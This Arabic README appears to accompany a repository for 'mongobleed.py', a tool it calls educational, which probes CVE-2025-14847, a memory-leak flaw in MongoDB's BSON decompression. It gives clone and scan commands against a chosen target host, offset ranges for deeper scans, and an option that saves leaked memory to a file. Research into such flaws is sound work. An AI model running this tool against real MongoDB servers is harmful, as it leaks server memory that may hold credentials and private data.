
أداة بحث تعليمية توضح كشف الذاكرة CVE-2025-14847 في فك ضغط BSON في MongoDB. تحاكي فشل فحوصات الحدود ومفاهيم أمان الذاكرة لتحليل الثغرات.
يحتوي هذا المستودع على أداة بحث تعليمية مصممة لتوضيح مفاهيم سلامة الذاكرة الكامنة خلف CVE-2025-14847، وهي ثغرة حرجة اكتُشفت في تطبيق MongoDB لفك ضغط BSON. تحاكي الأداة كيف يمكن لفحص الحدود غير السليم أثناء فك الضغط أن يؤدي إلى تسريب الذاكرة.
توضح هذه الأداة:
المتطلبات الأساسية
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Basic scan (offsets 20-8192)
python3 mongobleed.py --host <target>
# Deep scan for more data
python3 mongobleed.py --host <target> --max-offset 50000
# Custom range
python3 mongobleed.py --host <target> --min-offset 100 --max-offset 20000
تسلط هذه الثغرة الضوء على قضايا أوسع في أمان قواعد البيانات:
موارد رسمية:
| الخيار | الافتراضي | الوصف |
|---|
--host | localhost | مضيف MongoDB المستهدف |
--port | 27017 | منفذ MongoDB المستهدف |
--min-offset | 20 | الحد الأدنى لطول المستند للفحص |
--max-offset | 8192 | الحد الأقصى لطول المستند للفحص |
--output | leaked.bin | ملف الإخراج للبيانات المسربة |